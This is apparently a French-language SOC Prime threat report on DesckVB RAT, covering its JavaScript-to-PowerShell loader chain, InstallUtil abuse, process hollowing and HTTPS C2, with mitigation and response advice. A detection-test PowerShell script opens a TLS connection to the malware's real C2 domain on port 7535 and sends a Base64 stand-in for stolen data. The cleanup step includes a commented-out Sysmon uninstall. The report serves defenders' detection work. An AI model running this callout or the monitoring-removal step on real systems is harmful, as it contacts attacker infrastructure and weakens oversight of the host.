Analyse de DesckVB RAT : Du chargeur JavaScript au RAT .NET sans fichier

Ruslan Mikhalov Chef de la Recherche sur les Menaces chez SOC Prime

Suivre

Analyse de DesckVB RAT : Du chargeur JavaScript au RAT .NET sans fichier

Detection stack

AIDR
Alert
ETL
Query

Rapport
Flux d'Attaque
Détections
Simulations

Résumé

DesckVB RAT est un cheval de Troie piloté par JavaScript qui enchaîne avec un chargeur PowerShell pour récupérer et exécuter une DLL .NET sans fichier directement en mémoire. Pour dissimuler l’exécution, le chargeur utilise le codage Base64 et l’obfuscation par inversion de chaînes, abuse de InstallUtil.exe en tant que LOLBin, et génère un nouveau processus à l’aide de CreateProcessA. Une fois actif, le RAT établit des communications C2 chiffrées en HTTPS et prend en charge des modules pour l’enregistrement de frappe, l’accès à la webcam et la découverte anti-AV.

Enquête

L’analyse indique que la première étape en JavaScript écrit un script PowerShell dans C:UsersPublic, puis accède à un domaine obfusqué pour télécharger un assembly .NET (par exemple, ClassLibrary3.dll). L’assembly charge des DLL de support, crée un processus suspendu et injecte le code de la charge utile tout en signalant des détails de configuration tels qu’un domaine malveillant secondaire et un port. La télémétrie réseau confirme des communications chiffrées TLS de l’hôte infecté vers l’infrastructure C2 de l’attaquant.

Atténuation

Bloquez l’exécution de scripts PowerShell non fiables ou non signés et restreignez l’utilisation de InstallUtil.exe pour les flux de travail non administratifs ou inattendus. Appliquez des contrôles stricts en sortie, y compris l’inspection HTTPS lorsque possible et le filtrage de réputation de domaine pour l’infrastructure malveillante identifiée. Sur les points de terminaison, détectez l’utilisation de CreateProcessA avec des indicateurs de processus suspendu et alertez sur les schémas de chargement d’assembly .NET en mémoire cohérents avec l’injection sans fichier.

Réponse

Si des indicateurs sont détectés, isolez le point de terminaison, arrêtez la chaîne de processus malveillante et capturez les vidages de mémoire pour l’analyse des assemblées en mémoire et des régions injectées. Supprimez les artefacts PowerShell déposés dans C:UsersPublic et éliminez toutes les DLL ou restes de chargeur connexes. Réinitialisez les identifiants impactés, faites tourner les secrets exposés, et examinez les journaux de pare-feu/proxy pour les connexions sortantes vers les domaines et ports listés.

"graph TB %% Class definitions classDef action fill:#ffcc99 classDef tool fill:#99ccff classDef malware fill:#ccffcc classDef file fill:#dddddd %% Nodes loader_js["Outil – Nom: Chargeur JavaScript Obfusqué Technique: T1027.006 Exfiltration HTML“ class loader_js tool powershell_script["Outil – Nom: Script PowerShell lkpzw_01.ps1 Technique: T1059.001 PowerShell Description: S’exécute avec une politique d’exécution contournée"] class powershell_script tool dotnet_assembly["Fichier: Assembly .NET Malveillant"] class dotnet_assembly file installutil_execution["Outil – Nom: InstallUtil.exe Technique: T1218.004 Exécution de Proxy par Binaire Système Description: Exécute une DLL .NET via un binaire système de confiance"] class installutil_execution tool dotnet_reflection["Malware – Nom: ClassLibrary3.dll Technique: T1620 Chargement de Code Réflexif Description: Charge l’assembly directement en mémoire en utilisant la réflexion"] class dotnet_reflection malware process_hollow["Action – Technique: T1055.012 Creusement de Processus Description: Crée un processus suspendu et injecte du code malveillant"] class process_hollow action thread_hijack["Action – Technique: T1055.003 Détournement de l’Exécution de Thread Description: Détourne l’exécution de thread au sein du processus cible"] class thread_hijack action dll_hijack["Action – Technique: T1574.001 Détournement de Flux d’Exécution DLL Description: Charge des DLL supplémentaires en mémoire pour étendre la fonctionnalité"] class dll_hijack action keylogger_module["Malware – Nom: Microsoft.exe Technique: T1056.001 Enregistrement de Frappe Description: Dépose un enregistreur de frappe et d’autres modules"] class keylogger_module malware c2_https["Action – Technique: T1071.001 Protocoles Web Description: Communique sur HTTPS en se mêlant au trafic légitime"] class c2_https action %% Connections loader_js –>|écrit et exécute| powershell_script powershell_script –>|télécharge l’assembly| dotnet_assembly dotnet_assembly –>|exécuté via| installutil_execution installutil_execution –>|charge par réflexion| dotnet_reflection dotnet_reflection –>|crée un processus suspendu| process_hollow process_hollow –>|utilise le détournement de thread| thread_hijack thread_hijack –>|charge des DLL supplémentaires| dll_hijack dll_hijack –>|active| keylogger_module keylogger_module –>|communique avec C2| c2_https "

Flux d’attaque

Narratif et Commandes d’Attaque :
L’attaquant, ayant obtenu une première base, lance une charge utile PowerShell basée sur le principe de « vivre des ressources du terrain » qui ouvre une connexion TCP enveloppée TLS au domaine C2 codé en dur manikandan83.mysynology.net sur le port 7535. La charge utile encode un bloc de données fictif avec Base64 (illustrant T1132.002) et le transmet via le canal TLS. Comme les classes .NET de PowerShell sont utilisées, aucun binaire externe n’est écrit sur le disque, reflétant la nature sans fichier de DesckVB RAT. La connexion est établie par un processus enfant (powershell.exe) qui sera capturé par Sysmon comme un événement de connexion réseau avec le domaine exact, le port et le drapeau de poignée TLS que la règle surveille.

Script de Test de Régression :

# --------------------------------------------------------------
# Simulation de Communication C2 DesckVB RAT (PowerShell) 
# --------------------------------------------------------------
# Paramètres
$c2Domain = "manikandan83.mysynology.net"
$c2Port   = 7535

# Charge utile fictive (encodée en Base64) – représente les données exfiltrées
$payload  = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("sensor_data=42"))

try {
    # Établir une connexion TCP
    $tcpClient = New-Object System.Net.Sockets.TcpClient($c2Domain, $c2Port)
    $netStream = $tcpClient.GetStream()

    # Entourer de TLS (SslStream)
    $sslStream = New-Object System.Net.Security.SslStream($netStream,$false,({$true}))
    $sslStream.AuthenticateAsClient($c2Domain)

    Write-Host "[+] Poignée TLS terminée avec $c2Domain:$c2Port"

    # Envoyer le préfixe de longueur de charge utile (4 octets en big endian) puis les données
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($payload)
    $len   = [BitConverter]::GetBytes([System.Net.IPAddress]::HostToNetworkOrder($bytes.Length))
    $sslStream.Write($len,0,$len.Length)
    $sslStream.Write($bytes,0,$bytes.Length)
    $sslStream.Flush()
    Write-Host "[+] Charge utile envoyée (longueur Base64 $($bytes.Length))"

} catch {
    Write-Error "[-] Connexion échouée: $_"
} finally {
    # Arrêt propre
    if ($sslStream) { $sslStream.Close() }
    if ($netStream) { $netStream.Close() }
    if ($tcpClient) { $tcpClient.Close() }
    Write-Host "[*] Connexion terminée."
}

Commandes de Nettoyage :

# Assurez-vous que toutes les connexions PowerShell NetTCP restantes sont fermées
Get-Process -Name powershell | Where-Object {
    $_.Modules.ModuleName -match 'System.Net.Sockets.TcpClient'
} | Stop-Process -Force

# Optionnel: Supprimer Sysmon (si c'est un environnement de test unique)
# & "$env:ProgramFilesSysmonSysmon.exe" -u

Rejoignez la plateforme Detection as Code de SOC Prime pour améliorer la visibilité sur les menaces les plus pertinentes pour votre entreprise. Pour vous aider à démarrer et à générer une valeur immédiate, planifiez dès maintenant une réunion avec des experts de SOC Prime.

Rejoindre gratuitement